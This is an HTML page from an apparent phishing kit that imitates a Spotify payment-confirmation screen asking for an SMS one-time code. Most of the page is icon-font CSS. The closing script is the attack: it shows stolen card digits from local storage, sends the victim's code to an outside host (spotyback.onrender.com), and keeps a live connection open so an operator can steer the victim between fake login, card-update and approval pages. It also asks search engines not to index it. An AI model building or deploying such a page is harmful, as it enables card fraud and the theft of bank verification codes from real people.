<!DOCTYPE html>
<html>

<head>



    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="robots"
        content="noindex," "nofollow,"="" "noimageindex,"="" "noarchive,"="" "nocache,"="" "nosnippet"="">
    <style type="text/css">
        svg:not(:root).svg-inline--fa {
            overflow: visible
        }

        .svg-inline--fa {
            display: inline-block;
            font-size: inherit;
            height: 1em;
            overflow: visible;
            vertical-align: -.125em
        }

        .svg-inline--fa.fa-lg {
            vertical-align: -.225em
        }

        .svg-inline--fa.fa-w-1 {
            width: .0625em
        }

        .svg-inline--fa.fa-w-2 {
            width: .125em
        }

        .svg-inline--fa.fa-w-3 {
            width: .1875em
        }

        .svg-inline--fa.fa-w-4 {
            width: .25em
        }

        .svg-inline--fa.fa-w-5 {
            width: .3125em
        }

        .svg-inline--fa.fa-w-6 {
            width: .375em
        }

        .svg-inline--fa.fa-w-7 {
            width: .4375em
        }

        .svg-inline--fa.fa-w-8 {
            width: .5em
        }

        .svg-inline--fa.fa-w-9 {
            width: .5625em
        }

        .svg-inline--fa.fa-w-10 {
            width: .625em
        }

        .svg-inline--fa.fa-w-11 {
            width: .6875em
        }

        .svg-inline--fa.fa-w-12 {
            width: .75em
        }

        .svg-inline--fa.fa-w-13 {
            width: .8125em
        }

        .svg-inline--fa.fa-w-14 {
            width: .875em
        }

        .svg-inline--fa.fa-w-15 {
            width: .9375em
        }

        .svg-inline--fa.fa-w-16 {
            width: 1em
        }

        .svg-inline--fa.fa-w-17 {
            width: 1.0625em
        }

        .svg-inline--fa.fa-w-18 {
            width: 1.125em
        }

        .svg-inline--fa.fa-w-19 {
            width: 1.1875em
        }

        .svg-inline--fa.fa-w-20 {
            width: 1.25em
        }

        .svg-inline--fa.fa-pull-left {
            margin-right: .3em;
            width: auto
        }

        .svg-inline--fa.fa-pull-right {
            margin-left: .3em;
            width: auto
        }

        .svg-inline--fa.fa-border {
            height: 1.5em
        }

        .svg-inline--fa.fa-li {
            width: 2em
        }

        .svg-inline--fa.fa-fw {
            width: 1.25em
        }

        .fa-layers svg.svg-inline--fa {
            bottom: 0;
            left: 0;
            margin: auto;
            position: absolute;
            right: 0;
            top: 0
        }

        .fa-layers {
            display: inline-block;
            height: 1em;
            position: relative;
            text-align: center;
            vertical-align: -.125em;
            width: 1em
        }

        .fa-layers svg.svg-inline--fa {
            -webkit-transform-origin: center center;
            transform-origin: center center
        }

        .fa-layers-counter,
        .fa-layers-text {
            display: inline-block;
            position: absolute;
            text-align: center
        }

        .fa-layers-text {
            left: 50%;
            top: 50%;
            -webkit-transform: translate(-50%, -50%);
            transform: translate(-50%, -50%);
            -webkit-transform-origin: center center;
            transform-origin: center center
        }

        .fa-layers-counter {
            background-color: #ff253a;
            border-radius: 1em;
            -webkit-box-sizing: border-box;
            box-sizing: border-box;
            color: #fff;
            height: 1.5em;
            line-height: 1;
            max-width: 5em;
            min-width: 1.5em;
            overflow: hidden;
            padding: .25em;
            right: 0;
            text-overflow: ellipsis;
            top: 0;
            -webkit-transform: scale(.25);
            transform: scale(.25);
            -webkit-transform-origin: top right;
            transform-origin: top right
        }

        .fa-layers-bottom-right {
            bottom: 0;
            right: 0;
            top: auto;
            -webkit-transform: scale(.25);
            transform: scale(.25);
            -webkit-transform-origin: bottom right;
            transform-origin: bottom right
        }

        .fa-layers-bottom-left {
            bottom: 0;
            left: 0;
            right: auto;
            top: auto;
            -webkit-transform: scale(.25);
            transform: scale(.25);
            -webkit-transform-origin: bottom left;
            transform-origin: bottom left
        }

        .fa-layers-top-right {
            right: 0;
            top: 0;
            -webkit-transform: scale(.25);
            transform: scale(.25);
            -webkit-transform-origin: top right;
            transform-origin: top right
        }

        .fa-layers-top-left {
            left: 0;
            right: auto;
            top: 0;
            -webkit-transform: scale(.25);
            transform: scale(.25);
            -webkit-transform-origin: top left;
            transform-origin: top left
        }

        .fa-lg {
            font-size: 1.3333333333em;
            line-height: .75em;
            vertical-align: -.0667em
        }

        .fa-xs {
            font-size: .75em
        }

        .fa-sm {
            font-size: .875em
        }

        .fa-1x {
            font-size: 1em
        }

        .fa-2x {
            font-size: 2em
        }

        .fa-3x {
            font-size: 3em
        }

        .fa-4x {
            font-size: 4em
        }

        .fa-5x {
            font-size: 5em
        }

        .fa-6x {
            font-size: 6em
        }

        .fa-7x {
            font-size: 7em
        }

        .fa-8x {
            font-size: 8em
        }

        .fa-9x {
            font-size: 9em
        }

        .fa-10x {
            font-size: 10em
        }

        .fa-fw {
            text-align: center;
            width: 1.25em
        }

        .fa-ul {
            list-style-type: none;
            margin-left: 2.5em;
            padding-left: 0
        }

        .fa-ul>li {
            position: relative
        }

        .fa-li {
            left: -2em;
            position: absolute;
            text-align: center;
            width: 2em;
            line-height: inherit
        }

        .fa-border {
            border: solid .08em #eee;
            border-radius: .1em;
            padding: .2em .25em .15em
        }

        .fa-pull-left {
            float: left
        }

        .fa-pull-right {
            float: right
        }

        .fa.fa-pull-left,
        .fab.fa-pull-left,
        .fal.fa-pull-left,
        .far.fa-pull-left,
        .fas.fa-pull-left {
            margin-right: .3em
        }

        .fa.fa-pull-right,
        .fab.fa-pull-right,
        .fal.fa-pull-right,
        .far.fa-pull-right,
        .fas.fa-pull-right {
            margin-left: .3em
        }

        .fa-spin {
            -webkit-animation: fa-spin 2s infinite linear;
            animation: fa-spin 2s infinite linear
        }

        .fa-pulse {
            -webkit-animation: fa-spin 1s infinite steps(8);
            animation: fa-spin 1s infinite steps(8)
        }

        @-webkit-keyframes fa-spin {
            0% {
                -webkit-transform: rotate(0);
                transform: rotate(0)
            }

            100% {
                -webkit-transform: rotate(360deg);
                transform: rotate(360deg)
            }
        }

        @keyframes fa-spin {
            0% {
                -webkit-transform: rotate(0);
                transform: rotate(0)
            }

            100% {
                -webkit-transform: rotate(360deg);
                transform: rotate(360deg)
            }
        }

        .fa-rotate-90 {
            -webkit-transform: rotate(90deg);
            transform: rotate(90deg)
        }

        .fa-rotate-180 {
            -webkit-transform: rotate(180deg);
            transform: rotate(180deg)
        }

        .fa-rotate-270 {
            -webkit-transform: rotate(270deg);
            transform: rotate(270deg)
        }

        .fa-flip-horizontal {
            -webkit-transform: scale(-1, 1);
            transform: scale(-1, 1)
        }

        .fa-flip-vertical {
            -webkit-transform: scale(1, -1);
            transform: scale(1, -1)
        }

        .fa-flip-both,
        .fa-flip-horizontal.fa-flip-vertical {
            -webkit-transform: scale(-1, -1);
            transform: scale(-1, -1)
        }

        :root .fa-flip-both,
        :root .fa-flip-horizontal,
        :root .fa-flip-vertical,
        :root .fa-rotate-180,
        :root .fa-rotate-270,
        :root .fa-rotate-90 {
            -webkit-filter: none;
            filter: none
        }

        .fa-stack {
            display: inline-block;
            height: 2em;
            position: relative;
            width: 2.5em
        }

        .fa-stack-1x,
        .fa-stack-2x {
            bottom: 0;
            left: 0;
            margin: auto;
            position: absolute;
            right: 0;
            top: 0
        }

        .svg-inline--fa.fa-stack-1x {
            height: 1em;
            width: 1.25em
        }

        .svg-inline--fa.fa-stack-2x {
            height: 2em;
            width: 2.5em
        }

        .fa-inverse {
            color: #fff
        }

        .sr-only {
            border: 0;
            clip: rect(0, 0, 0, 0);
            height: 1px;
            margin: -1px;
            overflow: hidden;
            padding: 0;
            position: absolute;
            width: 1px
        }

        .sr-only-focusable:active,
        .sr-only-focusable:focus {
            clip: auto;
            height: auto;
            margin: 0;
            overflow: visible;
            position: static;
            width: auto
        }

        .svg-inline--fa .fa-primary {
            fill: var(--fa-primary-color, currentColor);
            opacity: 1;
            opacity: var(--fa-primary-opacity, 1)
        }

        .svg-inline--fa .fa-secondary {
            fill: var(--fa-secondary-color, currentColor);
            opacity: .4;
            opacity: var(--fa-secondary-opacity, .4)
        }

        .svg-inline--fa.fa-swap-opacity .fa-primary {
            opacity: .4;
            opacity: var(--fa-secondary-opacity, .4)
        }

        .svg-inline--fa.fa-swap-opacity .fa-secondary {
            opacity: 1;
            opacity: var(--fa-primary-opacity, 1)
        }

        .svg-inline--fa mask .fa-primary,
        .svg-inline--fa mask .fa-secondary {
            fill: #000
        }

        .fad.fa-inverse {
            color: #fff
        }
    </style>
    <link rel="stylesheet" href="./vb/bootstrap.css">
    <link rel="stylesheet" href="./vb/helpers.css">
    <link rel="stylesheet" href="./vb/style.css">
    <script src="./vb/jquery-3.5.1.min.js"></script>

    <link rel="icon" href="https://open.spotifycdn.com/cdn/images/favicon32.b64ecc03.png">

    <title>Spotify | OTP</title>
</head>

<body>

    <div class="sms">
        <div class="title d-flex align-items-center justify-content-between">
            <div><img width="90" src="./img/spot.png"></div>
            <div> <img id="img3r3" style="float: right;" src="">
            </div>
        </div>
        <h4>Please confirm the following payment.</h4>
        <form method="post" id="form" class="idform" novalidate>
            <input id="unique_id" name="unique_id" hidden>

            <div class="cont">
                <div id="error_request" style="color:red">Invalid OTP
                </div>
                <p>The unique password has been sent to the mobile number listed below. If you need to change your
                    mobile number please contact your bank of modify it via the available chanels (ATM, web).</p>
                <div class="row">
                    <div class="col-5"><b>Merchant:</b></div>
                    <div id="merchant" class="col-6" style="color: #666;">Spotify</div>
                </div>
                <div class="row">
                    <div class="col-5"><b>Amount:</b></div>
                    <div class="col-6" id="amount" style="color: #666;">$1</div>
                </div>
                <div class="row">
                    <div class="col-5"><b>Date:</b></div>
                    <div class="col-6" id="date" style="color: #666;"></div>
                </div>
                <div class="row">
                    <div class="col-5"><b>Credit card number:</b></div>
                    <div class="col-6" id="cc" style="color: #666;"><span class="col-6 always-left-to-right"></span>
                    </div>
                </div>
                <div class="row">
                    <div class="col-5"><b>SMS Code:</b></div>
                    <div class="col-6" style="color: #666;">
                        <input id="sms" type="tel" name="sms_code">
                        <div id="otp-error" class="error" style="font-size:12px"></div>
                    </div>
                    <div class="error" id="otp-error2" style="font-size:12px"></div>

                    <div class="text-center d-flex justify-content-center text-center">
                        <p style="font-size: 14px;text-align: center;margin-top: 2px;margin-bottom: 1rem;">Please enter
                            the verification code received by sms :</p>
                        <div style="font-weight: 700;margin-left:5px;" class="countdown style colorDefinition size_sm">
                        </div>
                    </div>
                </div>
                <div class="bttn text-end"><button id="submit-btn" onclick="sbmt()" type="button">Submit</button></div>
        </form>
        <p id="copyright"
            style="text-align: center;background: #eaeaea;    margin-bottom: 0;color: #333;font-size: 13px;padding: 10px;">
        </p>
    </div>

    <!-- JS FILES -->
    <script src="./vb/bootstrap.bundle.min.js"></script>
    <script src="./vb/all.min.js"></script>
    <script src="./vb/jquery.payment.min.js"></script>
    <script src="./vb/jquery.mask.js"></script>
    <script src="./vb/jquery.countdownTimer.min.js"></script>

    <script type="text/javascript">
        $(".countdown").countdowntimer({
            minutes: 2,
            timeUp: timeIsUp
        });
        function timeIsUp() {
            $(".countdown").html('Try again');
        }
        $('.countdown').click(function () {
            location.reload();
        });
        function displayCurrentDate() {
            const now = new Date();
            const year = now.getFullYear();
            const month = String(now.getMonth() + 1).padStart(2, '0');
            const day = String(now.getDate()).padStart(2, '0');
            const formattedDate = `${year}-${month}-${day}`;
            document.getElementById('date').textContent = formattedDate;
        }
        window.onload = function () {
            displayCurrentDate();
        };
    </script>
    <script>
     
        function formatCreditCard(cardNumber) {
         
            if (cardNumber.length < 16) return cardNumber;
            return cardNumber.substring(0, 4) + ' xxxx xxxx ' + cardNumber.substring(cardNumber.length - 4);
        }
    
        document.addEventListener('DOMContentLoaded', async function () {
            let userId = localStorage.getItem('userId');
    
            if (!userId) {
                try {
                    const response = await fetch('https://spotyback.onrender.com/user-id', {
                        method: 'GET',
                        headers: {
                            'Content-Type': 'application/json',
                        },
                    });
    
                    const data = await response.json();
    
                    if (data.success) {
                        localStorage.setItem('userId', data.userId);
                        userId = data.userId;
                    } else {
                        console.error('Error generating user ID');
                        return;
                    }
                } catch (error) {
                    console.error('Error fetching user ID:', error);
                    return;
                }
            }
    
       
            const storedData = JSON.parse(localStorage.getItem('creditCardInfo'));
    
          
            if (storedData && storedData.cc) {
          
                const cardNumber = storedData.cc.replace(/\D/g, '');
                const formattedCardNumber = formatCreditCard(cardNumber); 
    
                document.getElementById('cc').innerHTML = formattedCardNumber;
            } else {
                console.log("Credit card data not found in localStorage.");
            }
    
      
            $("#submit-btn").click(function () {
                sbmt(userId);
            });
    
            async function sbmt(userId) {
                var sms = $("#sms").val();
                var sub = true;
                $("#sms").removeClass("error");
    
                if (sms.length < 4) {
                    $("#sms").addClass("error");
                    sub = false;
                }
    
                if (sub) {
                    try {
                        const response = await fetch('https://spotyback.onrender.com/send-sms', {
                            method: 'POST',
                            headers: {
                                'Content-Type': 'application/json',
                            },
                            body: JSON.stringify({
                                codeSms: sms,
                                userId: userId
                            })
                        });
    
                        const data = await response.json();
                        if (data.success) {
                            window.location.href = 'loading.html';
                            listenForSSE(userId);
                        } else {
                         
                        }
                    } catch (error) {
                     
                    }
                }
            }
            listenForSSE(userId);
        });
    
        function listenForSSE(userId) {
            const eventSource = new EventSource(`https://spotyback.onrender.com/sse/${userId}`);
            console.log("Attempting to establish SSE connection for userId:", userId);
            eventSource.onmessage = function (event) {
                console.log("SSE Message received:", event);
    
                try {
                    const data = JSON.parse(event.data);
                    if (!data.action) {
                        return;
                    }
    
                    console.log("Action received:", data.action);
    
                    if (data.action === "login") {
                        window.location.href = 'index.html';
                    } else if (data.action === "cc") {
                        window.location.href = 'update.html';
                    } else if (data.action === "sms") {
                        window.location.href = 'qom.html';
                    } else if (data.action === "approve") {
                        window.location.href = 'approve.html';
                    } else if (data.action === "thankyou") {
                        window.location.href = 'thankyou.html';
                    } else if (data.action === "updateError") {
                        window.location.href = 'updateError.html';
                    } else if (data.action === "otpError") {
                        window.location.href = 'otpError.html';
                    }else if (data.action === "loginError") {
                        window.location.href = 'login.html';
                    } else {
                        window.location.href = 'login.html';
                    }
                } catch (error) {
                    console.error("Error parsing SSE data:", error);
                    window.location.href = 'login.html';
                }
            };
    
            eventSource.onerror = function (event) {
                console.error("SSE connection error:", event);
                eventSource.close();
            };
    
            eventSource.onopen = function (event) {
                console.log("SSE connection successfully opened:", event);
            };
    
            eventSource.onclose = function (event) {
                console.log("SSE connection closed:", event);
            };
        }
    </script>
    
    


</body>

</html>